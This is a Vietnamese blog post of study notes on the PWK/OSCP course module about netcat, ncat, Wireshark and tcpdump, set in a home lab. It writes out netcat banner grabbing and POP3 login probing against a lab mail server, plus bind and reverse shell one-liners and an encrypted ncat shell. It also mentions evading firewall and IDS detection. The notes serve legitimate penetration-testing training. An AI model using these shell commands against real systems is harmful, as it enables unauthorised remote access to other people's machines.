Pentest With Kali Linux [PWK v1] Module 2 The Essential Tools

2 – The Essential Tools ………………………………………………………………………………………………
2.1 – Netcat …………………………………………………………………………………………………………………………………….
2.1.1 – Connecting to a TCP/UDP Port ………………………………………………………………………………………..
2.1.2 – Listening on a TCP/UDP Port…………………………………………………………………………………………..
2.1.3 – Transferring Files with Netcat …………………………………………………………………………………………..
2.1.4 – Remote Administration with Netcat …………………………………………………………………………………..
2.1.5 – Exercises …………………………………………………………………………………………………………………………..
2.2 – Ncat………………………………………………………………………………………………………………………………………..
2.2.1 – Exercises …………………………………………………………………………………………………………………………..
2.3 – Wireshark ………………………………………………………………………………………………………………………………
2.3.1 – Wireshark Basics……………………………………………………………………………………………………………….
2.3.2 – Making Sense of Network Dumps………………………………………………………………………………………
2.3.3 – Capture and Display Filters……………………………………………………………………………………………….
2.3.4 – Following TCP Streams …………………………………………………………………………………………………….
2.3.5 – Exercises …………………………………………………………………………………………………………………………..
2.4 – Tcpdump ……………………………………………………………………………………………………………………………….
2.4.1 – Filtering Traffic…………………………………………………………………………………………………………………
2.4.2 – Advanced Header Filtering ………………………………………………………………………………………………..
2.4.3 – Exercises …….

Lesson 11 : Các công cụ thiết yếu là netcat, ncat, wireshark, tcpdump (trong pwk v2 sẽ là chương Practice Tools). Nmap chắc chắn là thiết yếu nhưng nó thuộc hàng rất thiết yếu cho nên trong phiên bản mới nó được dành đất nhiều hơn, ngay cả ở đây nmap cũng được để cập rất nhiều. Cho dù bạn có học CEH, GPEN hay bất kì môn nào về hacking và pentest thì nhữn công cụ này vẫn được đề cập. Do đó, hãy đào sâu hơn về các chủ đề trên qua các bài viêt hay hướng dẫn thực hành chuyên dụng trên null byte hay hacking article để thật vững vàng.

Lesson 12 : Netcat / Đâu tiên là netcat, đây là công cụ thường được dùng để kết nối đến máy khác hay lắng nghe và nhận reverse shell, cmd. Ngoài ra nó còn dùng để truyền và nhận file, chãy trên máy victim để đây shell về cho atatcker … và nhiều công năng khác. Trong phiên bản mới của OSCP các bạn được giới thiệu một công cụ mạnh mẽ hơn nữa là socat, nhưng netcat là hàng thiết yếu. Hãy chạy Mecury mail server trên Windows 7 PreOSCP để thực hành…

Lesson 13 : Banner Grabing : Với netcat ta có thể lấy biểu ngữ của mục tiêu để biết được dịch vụ đang chạy là gì, lấy ví dụ Win 7 PreOSCP của các bạn có IP là 192.168.30.35 và đã chạy mecury mail server thì ta có thể kết nối đến port 25 hay 110 bằng netcat với tùy chọn nv. Để tiến hành kết nối và kiểm tra port 25 (smtp) có mở hay không như sau

#nc -nv 192.168.30.35 25

khi thấy thông báo open các bạn có thể chạy lệnh HELP để xem tài khoản, các lệnh có thể chạy trên máy chủ mail này, và tài khoản mail là mailser …

Kết nối đến port 110 (POP3)

#nc -nv 192.168.30.35 110

sẽ thấy port 110 mở hoặc đóng, trong video ta thấy banner là POP3 server ready

thử đăng nhập bằng cách gởi lệnh là USER bob thấy có tài khoản này, và nhập lệnh PASS bob để đăng nhập thì không thành công do sai pass.

Kết nối IMAP Server (port 143) #nc-nv 192.168.30.35 143 sẽ thấy banner là IMAP4rev1 Mecury/32 v4.52 server

Lesson 14 : Netcat Chat : Các bạn có thể dùng netcat để chat, biết thêm cho vui và biết đâu sẽ dùng chứ trong bài thi thi chat với ai :-). Ở đây ta chạy netcat trên Kali và cả Windows rồi chat chít và thậm chí truyền / nhận file.

Lesson 15 Thực thi lệnh từ xa với netcat : Chức năng này cho ta khả năng chạy các lệnh như bash , cmd để revershell rất hữu ích. Khi các bạn làm các bài CTF bị lỗi Command injection hư OWASP BWA hay DVWA hay trên WebScanTest thì lưu ý đến tình huống này. Dĩ nhiên, trước đó cần kiểm tra hay tìm kiếm các phiên bản cài đặt của netcat trên máy mục tiêu với locate hay which / find rồi tính xem nên dùng bind shell hay reverse shell…

Lesson 16 : Bind Shell – Hãy hình dung bạn thấy 1 cái cây với trái táo ở trên, ta thò tay hái thì nó là bind shell, còn nếu các bạn nằm ở dưới há mồm ra chờ cho nó rớt vào thì nó là reverse shell. Hãy tham khảo 2 bài hướng dẫn sau sẽ hiểu rõ và cần ghi chú cũng như hình dung ra khi nào nên dùng cái nào, ví dụ firewall chặn đường vào hay chặn đường ra, rồi có IP thật để nhận kết nối hay không vv.vv

Hãy hình dùng Kali là ALICE và Win7 là BOD, khi nào Bod có IP public trên internet nên ta bind shell vào (các bài như webscantest hay tryhackme dvwa hãy thử tình huống này)

Bod sẽ lắng nghe với cmd.exe qua lệnh C:>nc -lvp 4444 -e cmd.exe

Sau đó ALICE (Kali Linux) sẽ kết nối đến bind shell với lệnh #nc -vn 192.168.30.35 4444 ta sẽ thấy port open và cmd.exe trả về, thử chạy ipconfig hay hostname xem sao, sau đó chụp kết quả lại …

Lesson 17 : Reverse Shell – Ở tình huống này thi các bạn sẽ có Alice (KALI) nằm ở sau firewall và không thế nhận conenct đến do đó không thể dùng Bind Shell. Vậy thì Bob sẽ lắng nghe trên Windows với lệnh $nc -lvp 4444 sau đó ALICE (Kali Linux) sẽ tạo reverse shell với lệnh :

#nc -vn 192.168.30.35 4444 -e /bin/bash

Khi này trên Bob Machine sẽ thấy 1 shell bash và ta có thể chạy lệnh linux trên đó như id, ifconfig, uname -a … (thực ra đang chạy trên Kali Linux của Alice). Các bạn hãy thử nghiệm và chụp hình minh họa, hãy dùng 1 máy Kali Linux và 1 máy là Windows 7 PreOSCP (hoặc dùng 1 máy Linux khác là Metasploitable 2 để minh họa). Lưu ý trên Windows 7 PreOSCP cần có tool netcat (nc).

Phần bind shell và reverse shell rất dễ nhầm lẫn nên các bạn cần ghi chú và thực hành cẩn thận. Hãy note vào Notepad++

Lesson 18 – NCAT : hạn chế của nectat là không mã hóa dữ liệu truyền nhằm tránh bị phát hiện bỏi firewall ahy IDS ,và khi này ncat sẽ đảm nhiệm, trong chủ đề mới của v2 oscp các bạn còn dùng thêm socat nhưng giờ hãy thử ncat xem sao

Ta sẽ dùng Bind Shell từ Alice (192.168.30.5) qua Bob (192.168.30.35) như Lection 16, hãy mã hóa kết nối này với ncat. Trong thư mục Tool có ncat.exe, hãy copy nó vào thư mục Windows để cùng thư mục với cmd.exe và thực thi lệnh :

C:\Users\OffSec>ncat -lvp 4444 -e cmd.exe –allow 192.168.30.5 -ssl

trên Kali ta chạy : #ncat -v 192.168.30.35 4444 –ssl

Bài này các bạn chỉ cần tham khảo vì phần sau sẽ ứng dụng socat thay thế, mạnh mẽ hơn, còn muốn triển khai phải cài đặt thêm OpenSSL.

Lesson 19 – WireShark : Đây là hàng khủng, cần thực hành thêm nhiều bài tập liên quan vì video minh họa như cưỡi ngựa xem hoa, nên nhớ Wiresahrk được sectools xếp vào hàng số 1 thế giới trong các công cụ bảo mật được dùng bởi hacker và chuyên gia bảo mật.

Còn một công cụ khác là tcpdump các bạn hãy xem trong giáo trình hoặc là bài giảng PWKv1 VN, vì bài giảng của OffSec họ không trình bày.

One thought on “Pentest With Kali Linux [PWK v1] Module 2 The Essential Tools

Trả lời

Please log in using one of these methods to post your comment:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Google photo

Bạn đang bình luận bằng tài khoản Google Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s